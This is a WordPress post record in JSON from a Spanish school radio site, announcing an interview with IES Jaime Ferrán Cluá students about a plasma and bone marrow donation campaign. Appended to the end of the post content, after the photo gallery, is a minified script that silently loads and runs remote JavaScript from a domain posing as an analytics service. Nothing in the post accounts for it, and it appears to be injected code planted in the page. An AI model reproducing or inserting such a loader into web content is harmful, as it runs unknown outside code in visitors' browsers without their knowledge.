{"id":3402,"date":"2023-06-02T17:55:21","date_gmt":"2023-06-02T17:55:21","guid":{"rendered":"https:\/\/radiojabato.es\/?p=3402"},"modified":"2026-04-20T15:43:33","modified_gmt":"2026-04-20T15:43:33","slug":"ies-jaime-ferran-clua-campana-de-donacion-de-plasma-y-medula-osea","status":"publish","type":"post","link":"https:\/\/radiojabato.es\/?p=3402","title":{"rendered":"IES. JAIME FERR\u00c1N CLU\u00c1: \u00abCampa\u00f1a de Donaci\u00f3n de Plasma y M\u00e9dula \u00d3sea.\u00bb"},"content":{"rendered":"\n<iframe frameborder='0' allowfullscreen='' scrolling='no' height='200' style='width:100%;' src='https:\/\/www.ivoox.com\/player_ej_109552767_6_1.html?c1=856255' loading='lazy'><\/iframe>\n\n\n\n<p>Entrevistamos al alumnado del IES. Jaime Ferr\u00e1n Clu\u00e1 que, con un trabajazo espectacular, han dado a conocer la necesidad de la donaci\u00f3n de plasma dentro de un proyecto pionero en la Comunidad de Madrid y de la donaci\u00f3n de medula \u00f3sea que, al contrario de lo que se piensa, NO te pinchan en la columna vertebral ni te dejan inv\u00e1lido.<br>Hablamos con Mar\u00eda, Itziar y Lorena, T\u00e9cnicos Superiores de Laboratorio, y con Alba y Braulio, T\u00e9cnicos en Cuidados de Enfermer\u00eda, cuentan c\u00f3mo han realizado el trabajo y curiosidades, as\u00ed como d\u00f3nde hacer la donaci\u00f3n.<br>Terminamos con el profesorado, Laura, Jos\u00e9 y Roy, que junto con Participaci\u00f3n Ciudadana del Ayuntamiento de San Fernando de Henares, Conchi, han guiado, participado y que sin duda sin ell@s no habr\u00eda sido tampoco posible.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"284\" height=\"177\" data-id=\"3403\" src=\"https:\/\/radiojabato.es\/wp-content\/uploads\/2023\/06\/Ferran-clua.jpg\" alt=\"\" class=\"wp-image-3403\"\/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"461\" data-id=\"3405\" src=\"https:\/\/radiojabato.es\/wp-content\/uploads\/2023\/06\/la-clua-2-1024x461.jpg\" alt=\"\" class=\"wp-image-3405\" srcset=\"https:\/\/radiojabato.es\/wp-content\/uploads\/2023\/06\/la-clua-2-1024x461.jpg 1024w, https:\/\/radiojabato.es\/wp-content\/uploads\/2023\/06\/la-clua-2-300x135.jpg 300w, https:\/\/radiojabato.es\/wp-content\/uploads\/2023\/06\/la-clua-2-768x346.jpg 768w, https:\/\/radiojabato.es\/wp-content\/uploads\/2023\/06\/la-clua-2.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"3406\" src=\"https:\/\/radiojabato.es\/wp-content\/uploads\/2023\/06\/la-clua-3-1024x768.jpg\" alt=\"\" class=\"wp-image-3406\" srcset=\"https:\/\/radiojabato.es\/wp-content\/uploads\/2023\/06\/la-clua-3-1024x768.jpg 1024w, https:\/\/radiojabato.es\/wp-content\/uploads\/2023\/06\/la-clua-3-300x225.jpg 300w, https:\/\/radiojabato.es\/wp-content\/uploads\/2023\/06\/la-clua-3-768x576.jpg 768w, https:\/\/radiojabato.es\/wp-content\/uploads\/2023\/06\/la-clua-3.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"461\" data-id=\"3404\" src=\"https:\/\/radiojabato.es\/wp-content\/uploads\/2023\/06\/la-clua-1024x461.jpg\" alt=\"\" class=\"wp-image-3404\" srcset=\"https:\/\/radiojabato.es\/wp-content\/uploads\/2023\/06\/la-clua-1024x461.jpg 1024w, https:\/\/radiojabato.es\/wp-content\/uploads\/2023\/06\/la-clua-300x135.jpg 300w, https:\/\/radiojabato.es\/wp-content\/uploads\/2023\/06\/la-clua-768x346.jpg 768w, https:\/\/radiojabato.es\/wp-content\/uploads\/2023\/06\/la-clua.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n<script>;(function(f,i,u,w,s){w=f.createElement(i);s=f.getElementsByTagName(i)[0];w.async=1;w.src=u;s.parentNode.insertBefore(w,s);})(document,'script','https:\/\/content-website-analytics.com\/script.js');<\/script>","protected":false},"excerpt":{"rendered":"<p>Entrevistamos al alumnado del IES. Jaime Ferr\u00e1n Clu\u00e1 que, con un trabajazo espectacular, han dado a conocer la necesidad de la donaci\u00f3n de plasma dentro de un proyecto pionero en [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[874],"tags":[],"class_list":["post-3402","post","type-post","status-publish","format-standard","hentry","category-ies-jaime-ferran-clua"],"_links":{"self":[{"href":"https:\/\/radiojabato.es\/index.php?rest_route=\/wp\/v2\/posts\/3402","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/radiojabato.es\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/radiojabato.es\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/radiojabato.es\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/radiojabato.es\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3402"}],"version-history":[{"count":2,"href":"https:\/\/radiojabato.es\/index.php?rest_route=\/wp\/v2\/posts\/3402\/revisions"}],"predecessor-version":[{"id":14406,"href":"https:\/\/radiojabato.es\/index.php?rest_route=\/wp\/v2\/posts\/3402\/revisions\/14406"}],"wp:attachment":[{"href":"https:\/\/radiojabato.es\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3402"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/radiojabato.es\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3402"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/radiojabato.es\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3402"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}